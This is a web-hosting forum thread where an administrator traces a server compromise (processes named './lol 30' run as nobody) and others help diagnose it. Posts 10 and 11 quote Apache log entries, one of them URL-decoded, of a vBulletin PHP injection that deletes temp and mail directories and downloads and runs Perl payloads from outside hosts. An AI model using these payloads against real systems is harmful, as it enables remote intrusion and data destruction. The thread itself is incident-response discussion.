hosted by liquidweb


Go Back   Web Hosting Talk : Web Hosting Main Forums : Hosting Security and Technology : Process running as nobody
Reply

Forum Jump

Process running as nobody

Reply Post New Thread In Hosting Security and Technology Subscription
 
Send news tip View All Posts Thread Tools Search this Thread Display Modes
  #1  
Old
Web Hosting Guru
 
Join Date: Sep 2003
Location: UK
Posts: 342

Process running as nobody


Hi all,

Below is a copy of my top

Code:
12:14:26  up 50 days, 59 min,  1 user,  load average: 0.39, 0.42, 0.59
257 processes: 252 sleeping, 1 running, 0 zombie, 4 stopped
CPU states:  15.2% user   5.5% system   0.0% nice   0.0% iowait  79.1% idle
Mem:   514196k av,  502628k used,   11568k free,       0k shrd,  112768k buff
       156332k active,             310968k inactive
Swap: 2104504k av,  196156k used, 1908348k free                  145632k cached

  PID USER     PRI  NI  SIZE  RSS SHARE STAT %CPU %MEM   TIME CPU COMMAND
 2465 root      19   0  1184 1184   804 R     5.5  0.2   0:01   0 top
31482 nobody    10   0   608  604   548 S     1.3  0.1   0:10   0 ./lol 30
 1089 root      19  19 33184  13M 10400 S N   0.9  2.7  1646m   0 ./server_linux -PID=tsserver2.pid
28521 nobody    10   0   576  572   516 S     0.9  0.1   0:05   0 ./lol 30
28523 nobody    10   0   576  572   516 S     0.9  0.1   0:05   0 ./lol 30
19621 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20010 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20014 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20028 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20469 nobody     9   0   620  616   560 S     0.4  0.1   0:12   0 ./lol 30
20610 nobody     9   0   620  616   560 S     0.4  0.1   0:12   0 ./lol 30
22113 nobody     9   0   612  608   552 S     0.4  0.1   0:11   0 ./lol 30
23021 nobody     9   0   608  604   548 S     0.4  0.1   0:10   0 ./lol 30
23096 nobody     9   0   604  600   544 S     0.4  0.1   0:10   0 ./lol 30
23497 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
23506 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
24227 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
24229 nobody     9   0   600  596   540 S     0.4  0.1   0:09   0 ./lol 30
25163 nobody     9   0   596  592   536 S     0.4  0.1   0:08   0 ./lol 30
26179 nobody     9   0   584  580   524 S     0.4  0.1   0:07   0 ./lol 30
26561 nobody     9   0   584  580   524 S     0.4  0.1   0:06   0 ./lol 30
27201 nobody     9   0   580  576   520 S     0.4  0.1   0:06   0 ./lol 30
28045 nobody     9   0   576  572   516 S     0.4  0.1   0:06   0 ./lol 30
28381 nobody     9   0   576  572   516 S     0.4  0.1   0:05   0 ./lol 30
28529 nobody     9   0   528  524   464 S     0.4  0.1   0:08   0 ./lol 30
28634 nobody     9   0   524  520   460 S     0.4  0.1   0:08   0 ./lol 30
28860 nobody     9   0   524  520   460 S     0.4  0.1   0:08   0 ./lol 30
30670 nobody     9   0   544  540   484 S     0.4  0.1   0:01   0 ./lol 30
31106 nobody     9   0   612  608   552 S     0.4  0.1   0:11   0 ./lol 30
31254 nobody     9   0   608  604   548 S     0.4  0.1   0:11   0 ./lol 30
    1 root       8   0   472  440   424 S     0.0  0.0   0:58   0 init [3]
    2 root       9   0     0    0     0 SW    0.0  0.0   0:01   0 keventd
    3 root       9   0     0    0     0 SW    0.0  0.0   2:32   0 kapmd
    4 root      19  19     0    0     0 SWN   0.0  0.0   0:00   0 ksoftirqd_CPU0
    5 root       9   0     0    0     0 SW    0.0  0.0   7:31   0 kswapd
    6 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 bdflush
    7 root       9   0     0    0     0 SW    0.0  0.0   2:02   0 kupdated
    8 root     18446744073709551615 -20     0    0     0 SW<   0.0  0.0   0:00   0 mdrecoveryd
   58 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 khubd
  277 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 kjournald
  278 root       9   0     0    0     0 SW    0.0  0.0   4:17   0 kjournald
  279 root       9   0     0    0     0 SW    0.0  0.0   1:25   0 kjournald
  280 root       9   0     0    0     0 SW    0.0  0.0   6:15   0 kjournald
  281 root       9   0     0    0     0 SW    0.0  0.0   3:22   0 kjournald
  750 root       9   0   556  520   476 S     0.0  0.1   3:41   0 syslogd -m 0
  754 root       9   0   420  368   368 S     0.0  0.0   0:00   0 klogd -x
 4411 root       9   0   984  776   776 S     0.0  0.1   0:00   0 /bin/bash
 4414 root       9   0   940  804   788 S     0.0  0.1   0:38   0 /usr/sbin/sshd
 4428 root       8   0   752  668   620 S     0.0  0.1   0:04   0 xinetd -stayalive -pidfile /var/run/xinetd.pid
 4670 root       8   0   580  568   524 S     0.0  0.1   0:18   0 crond
I have just noticed that ./lol 30 scripts being run as nobody.
I have checked /tmp (which is non-executable) /var/tmp (again the same) and have just checked /dev/shm (which isnt non-executable)

I removed a few files from there.
I have tried killing the processes however more seem to appear.

Can anyone help?

Thanks

__________________
Centation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.



Sponsored Links
  #2  
Old
Web Hosting Master
 
Join Date: Feb 2004
Posts: 2,197
Try running:

killall -9 lol

To find the file you can use:

locate lol


You may also want to install and run rkhunter and or chkrootkit.

__________________
crucialparadigm - Affordable, Reliable, Professional :
Web Hosting
• 24/7 Support • Web Hosting • Reseller Hosting • Cloud/VPS Plans • Dedicated Servers •

  #3  
Old
Web Hosting Master
 
Join Date: Dec 2004
Location: Canada
Posts: 1,082
Looks like your box has been exploited.

__________________
>> Keenan Tims
http://www.gotroot.ca/ | ktims@gotroot.ca

Sponsored Links
  #4  
Old
Web Hosting Master
 
Join Date: Apr 2003
Location: UK
Posts: 2,560
if i remember correctly, lol is a dosser, and i suspect you'll find your attacker has got in via an insecure webscript (check things like phpbb + coppermine versions).

check /var/tmp and /tmp for directories such as ". . " and the like

  #5  
Old
Web Hosting Master
 
Join Date: Nov 2004
Location: Dallas
Posts: 739
Yep, check tmp or kill all processes running on nobody

  #6  
Old
Web Hosting Guru
 
Join Date: Sep 2003
Location: UK
Posts: 342
Hi there,

I have run locate lol before however nothing out of the ordinary comes up. Just a lot of .gif files.
Im running updatedb and then gonna try locate again to see if anything new comes up.
I have double checked all directorys and removed some more . folders.

Does anyone have a URL or any more information on the lol dosser, so i can isolate it and prevent it in the future?

//EDIT Just found lots of files in /usr/local/apache/proxy

One dir being Strobe which is a port prober. Also a dir called scan which contains the lol files. Also there is a dir called flood is it safe to remove the dir called flood?

Also does apache need the folder called proxy? If so what folders does it need? There is also httpd -DSSL in it, is that another trick?

Thanks

__________________
Centation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.


Last edited by Veus; 01-12-2005 at 11:24 AM.
  #7  
Old
Web Hosting Master
 
Join Date: Apr 2003
Location: UK
Posts: 2,560
ye thats a trick, we've seen the same (hackers?) tools on one of our custoemrs servers repeatedly. Out of interest is this a cpanel server?

they used a file called httpd -DSSL as well as various other rubbish renaming methods. Also included were psybncs and bots. Most of their stuff they kept in /tmp and /var/tmp although i did find stuff elsewhere. Try looking in your apache logs for wget

  #8  
Old
Web Hosting Guru
 
Join Date: Sep 2003
Location: UK
Posts: 342
Thats the same as what i found, quite a few psybncs and a few bots. Ill have a look thanks.
Yea it is a Cpanel server.
Im running grep - i wget * on my logs now to find which user is being careless!

__________________
Centation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.

  #9  
Old
Web Hosting Master
 
Join Date: Apr 2003
Location: UK
Posts: 2,560
we found it was an old version of the coppermine gallery software that was causing the problems (they were running 1.2, and 1.3.something is the latest secure ver)

  #10  
Old
Web Hosting Guru
 
Join Date: Sep 2003
Location: UK
Posts: 342
After searching for wget in the domlogs i have found the following entries:

Code:
/usr/local/apache/domlogs/domain.com:209.126.164.246 - - [01/Jan/2005:21:58:17 +0000] "GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527 HTTP/1.0" 200 47435 "-" "LWP::Simple/5.43"
/usr/local/apache/domlogs/domain.com:70.84.39.148 - - [02/Jan/2005:09:15:23 +0000] "GET /showthread.php?t=8240&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 67361 "-" "LWP::Simple/5.803"
/usr/local/apache/domlogs/domain.com:203.24.100.137 - - [02/Jan/2005:11:25:51 +0000] "GET /showthread.php?t=9722&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.0" 200 73304 "-" "LWP::Simple/5.64"
/usr/local/apache/domlogs/domain.com:208.234.15.155 - - [03/Jan/2005:22:47:40 +0000] "GET /printthread.php?t=9849&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 6881 "-" "LWP::Simple/5.63"
/usr/local/apache/domlogs/domain.com:193.210.126.79 - - [10/Jan/2005:04:30:31 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.79"
/usr/local/apache/domlogs/domain.com:209.152.178.80 - - [10/Jan/2005:23:34:51 +0000] "GET /printthread.php?t=471&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2852 "-" "LWP::Simple/5.63"
/usr/local/apache/domlogs/domain.com:209.152.178.80 - - [11/Jan/2005:07:45:01 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.63"
It is a Vbulletin Installation running the latest 3.0.5. Does anyone recognise this pattern?

__________________
Centation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.

  #11  
Old
Web Hosting Master
 
Join Date: Jun 2003
Posts: 961
Code:
GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527
is
GET /showthread.php?t=9840&rush=echo _START_; cd /tmp; rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd  /usr/local/apache/proxy/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;killall -9 wget; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527

